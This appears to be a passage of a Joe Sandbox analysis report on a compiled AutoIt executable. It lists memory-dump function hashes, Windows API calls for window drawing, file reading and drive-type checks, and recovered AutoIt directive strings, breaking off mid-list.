                                                              • Instruction ID: 50f2246c79f3aa7ba1eac9ef0924dbb84d7cedf00cd2beb438f1330e6fb1a8ab
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: FCC1B8326051930ADFAD8639C47413FFBA16EA37B171A075DD8B3CB1D5EE20C925E620
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: e7825113ed20b1d4484de01d59e814aa416bf426b6cc88df1370c45e5d9ce9b6
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: 6BC172336051930ADF6D463AC47413EFAA16EA37B1B1A076ED4B3DB1D5EE20C925F620
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: b48a9f2cc5df54e83c1af2f956abc8fec1282b5bcd0f9d59592a8850ef5d3334
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 89C1823260919309DF2D463AC47417EFBA17EA37B271A176DD4B3CB2D4EE20C965E620
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction ID: 15d1d70f03188d43bc4e53330503c5e223ced2a2d915164f4fa4f6313145cb36
                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                              • Instruction Fuzzy Hash: AE41C271D1051CEBCF48CFADC991AAEFBF2AF88201F948299D516AB345D730AB41DB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction ID: c0b61f73353acb38e96f2985669eb169c3a4294ec3c669a827e254074210c4a0
                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                              • Instruction Fuzzy Hash: 6B019278E00109EFCB48DF98C5909AEF7B5FF88314F608699E919A7301E730AE51DB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction ID: bace5587fca6ffba4399e71f31306700c66af29f1563a9a8a7e9847575198215
                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                              • Instruction Fuzzy Hash: 48019278E00109EFCB44DF98C5909AEF7B5FF88314F608699E919A7301D730AE51DB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00F8785B
                                                              • DeleteObject.GDI32(00000000), ref: 00F8786D
                                                              • DestroyWindow.USER32 ref: 00F8787B
                                                              • GetDesktopWindow.USER32 ref: 00F87895
                                                              • GetWindowRect.USER32(00000000), ref: 00F8789C
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F879DD
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F879ED
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87A35
                                                              • GetClientRect.USER32(00000000,?), ref: 00F87A41
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F87A7B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87A9D
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87AB0
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87ABB
                                                              • GlobalLock.KERNEL32(00000000), ref: 00F87AC4
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87AD3
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F87ADC
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87AE3
                                                              • GlobalFree.KERNEL32(00000000), ref: 00F87AEE
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87B00
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00FA2CAC,00000000), ref: 00F87B16
                                                              • GlobalFree.KERNEL32(00000000), ref: 00F87B26
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F87B4C
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F87B6B
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87B8D
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F87D7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: b45461b790a072cc0a8ed2cdbd80f867c6843f575ce32743c4f6e0e8917cb2a1
                                                              • Instruction ID: 31e2907e847be19571100f0fea75ffaa57395e1225d2cd393bf0fa9e23d5adaa
                                                              • Opcode Fuzzy Hash: b45461b790a072cc0a8ed2cdbd80f867c6843f575ce32743c4f6e0e8917cb2a1
                                                              • Instruction Fuzzy Hash: 9A027B71900219EFDB14EFA4CC89EAE7BB9EB48310F148159F905EB2A0C774ED45EB60
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,00F9F910), ref: 00F93627
                                                              • IsWindowVisible.USER32(?), ref: 00F9364B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 4105515805-45149045
                                                              • Opcode ID: 992a615721fff7a2b4bf906dc10bf089a549198dffbcbfd199d558d4389fbb90
                                                              • Instruction ID: 0e5a8c95d76310b79f3be95a0e62c843a220dfda0e144a1208de275ab70f596e
                                                              • Opcode Fuzzy Hash: 992a615721fff7a2b4bf906dc10bf089a549198dffbcbfd199d558d4389fbb90
                                                              • Instruction Fuzzy Hash: ADD18E316083019BDF04EF10C966FAE77A5AF95364F04445DF8825B3A2CB79EE4AEB41
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 00F9A630
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F9A661
                                                              • GetSysColor.USER32(0000000F), ref: 00F9A66D
                                                              • SetBkColor.GDI32(?,000000FF), ref: 00F9A687
                                                              • SelectObject.GDI32(?,00000000), ref: 00F9A696
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00F9A6C1
                                                              • GetSysColor.USER32(00000010), ref: 00F9A6C9
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00F9A6D0
                                                              • FrameRect.USER32(?,?,00000000), ref: 00F9A6DF
                                                              • DeleteObject.GDI32(00000000), ref: 00F9A6E6
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00F9A731
                                                              • FillRect.USER32(?,?,00000000), ref: 00F9A763
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F9A78E
                                                                • Part of subcall function 00F9A8CA: GetSysColor.USER32(00000012), ref: 00F9A903
                                                                • Part of subcall function 00F9A8CA: SetTextColor.GDI32(?,?), ref: 00F9A907
                                                                • Part of subcall function 00F9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F9A91D
                                                                • Part of subcall function 00F9A8CA: GetSysColor.USER32(0000000F), ref: 00F9A928
                                                                • Part of subcall function 00F9A8CA: GetSysColor.USER32(00000011), ref: 00F9A945
                                                                • Part of subcall function 00F9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F9A953
                                                                • Part of subcall function 00F9A8CA: SelectObject.GDI32(?,00000000), ref: 00F9A964
                                                                • Part of subcall function 00F9A8CA: SetBkColor.GDI32(?,00000000), ref: 00F9A96D
                                                                • Part of subcall function 00F9A8CA: SelectObject.GDI32(?,?), ref: 00F9A97A
                                                                • Part of subcall function 00F9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F9A999
                                                                • Part of subcall function 00F9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F9A9B0
                                                                • Part of subcall function 00F9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F9A9C5
                                                                • Part of subcall function 00F9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F9A9ED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: c149cb52233d32916b21b249ef88bb9f67b627a145e6d02b98996346253e8990
                                                              • Instruction ID: 2228093d0b5e390c7221aa6d912e724abd6598d60767f57a3d384799f5a42c08
                                                              • Opcode Fuzzy Hash: c149cb52233d32916b21b249ef88bb9f67b627a145e6d02b98996346253e8990
                                                              • Instruction Fuzzy Hash: 89916E72408305FFDB119F64DC08A5B7BA9FF88331F144A2AF962D61A0D771D948EB92
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?), ref: 00F12CA2
                                                              • DeleteObject.GDI32(00000000), ref: 00F12CE8
                                                              • DeleteObject.GDI32(00000000), ref: 00F12CF3
                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00F12CFE
                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00F12D09
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F4C43B
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F4C474
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F4C89D
                                                                • Part of subcall function 00F11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F12036,?,00000000,?,?,?,?,00F116CB,00000000,?), ref: 00F11B9A
                                                              • SendMessageW.USER32(?,00001053), ref: 00F4C8DA
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F4C8F1
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F4C907
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F4C912
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              • Opcode ID: 99ac4decca53e1fd88f3edb59e90156bc3b6fc137dd301aba7b44d175cae09ad
                                                              • Instruction ID: a64cc3cb6f1f3ed5b1c2d0fdb0048fa8f1dcd3588b047ef57a1c9ed2996ab538
                                                              • Opcode Fuzzy Hash: 99ac4decca53e1fd88f3edb59e90156bc3b6fc137dd301aba7b44d175cae09ad
                                                              • Instruction Fuzzy Hash: EC129E30A01201EFDB94CF24C884BA9BBE5BF04320F585569F999CB262D731EC95EBD1
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 00F874DE
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F8759D
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F875DB
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F875ED
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F87633
                                                              • GetClientRect.USER32(00000000,?), ref: 00F8763F
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F87683
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F87692
                                                              • GetStockObject.GDI32(00000011), ref: 00F876A2
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F876A6
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F876B6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F876BF
                                                              • DeleteDC.GDI32(00000000), ref: 00F876C8
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F876F4
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F8770B
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F87746
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F8775A
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F8776B
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F8779B
                                                              • GetStockObject.GDI32(00000011), ref: 00F877A6
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F877B1
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F877BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              • API String ID: 2910397461-517079104
                                                              • Opcode ID: ae9fb077bf1e0d30a23ed0d39fb5434e136a9a49565ba343a735630273332522
                                                              • Instruction ID: 2fb695d88d74c2cfbda7c1c2c2213d7467c9f72c53722acd3a07fc85c851e4c3
                                                              • Opcode Fuzzy Hash: ae9fb077bf1e0d30a23ed0d39fb5434e136a9a49565ba343a735630273332522
                                                              • Instruction Fuzzy Hash: C4A17071A40609BFEB14DBA4DC4AFAE7BB9EB04711F144115FA14EB2E0C7B4AD44DBA0
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00F7AD1E
                                                              • GetDriveTypeW.KERNEL32(?,00F9FAC0,?,\\.\,00F9F910), ref: 00F7ADFB
                                                              • SetErrorMode.KERNEL32(00000000,00F9FAC0,?,\\.\,00F9F910), ref: 00F7AF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: 7938495d0e6c9c19f7e8cd78a19246e21a5305d753815acc48628b5e33af0388
                                                              • Instruction ID: 1b0eba2e557d47e2bfb6391b697eecf0a3d911beaf4b76cba7bce7a9a27eb5f4
                                                              • Opcode Fuzzy Hash: 7938495d0e6c9c19f7e8cd78a19246e21a5305d753815acc48628b5e33af0388
                                                              • Instruction Fuzzy Hash: 055173B2A49206AACB10EB10CE52EFD7361EBC8750722C05BE40AA71D1DA75DD42BB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: b894be27ab8d5f1e507d559d7ad771b177f12ed2418be5a71509d0b2627ca40a
                                                              • Instruction ID: 9a5c7f698389934ae164ddae1fc449e1a2e532ef2424000e0d4698ce2e40dc43
                                                              • Opcode Fuzzy Hash: b894be27ab8d5f1e507d559d7ad771b177f12ed2418be5a71509d0b2627ca40a
                                                              • Instruction Fuzzy Hash: 9481F8B1A40206ABDF11EF60DC43FFE7B68AF15720F044025FD05EA192EB69DA85F661
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F99AD2
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F99B8B
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F99BA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: e7b9f683f7061e7d250d82e32722324d809f854caface3fb6cda2c8445e66bae
                                                              • Instruction ID: 71f2b43ecfc30062015fe62a919b73b6eede9f42cd30e7be2d2a18bbc91b949d
                                                              • Opcode Fuzzy Hash: e7b9f683f7061e7d250d82e32722324d809f854caface3fb6cda2c8445e66bae
                                                              • Instruction Fuzzy Hash: C802F131508301AFEB25CF28CC89BAABBE5FF89324F04452DF495D62A1C7B5D844EB52
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 00F9A903
                                                              • SetTextColor.GDI32(?,?), ref: 00F9A907
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F9A91D
                                                              • GetSysColor.USER32(0000000F), ref: 00F9A928
                                                              • CreateSolidBrush.GDI32(?), ref: 00F9A92D
                                                              • GetSysColor.USER32(00000011), ref: 00F9A945
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F9A953
                                                              • SelectObject.GDI32(?,00000000), ref: 00F9A964
                                                              • SetBkColor.GDI32(?,00000000), ref: 00F9A96D
                                                              • SelectObject.GDI32(?,?), ref: 00F9A97A
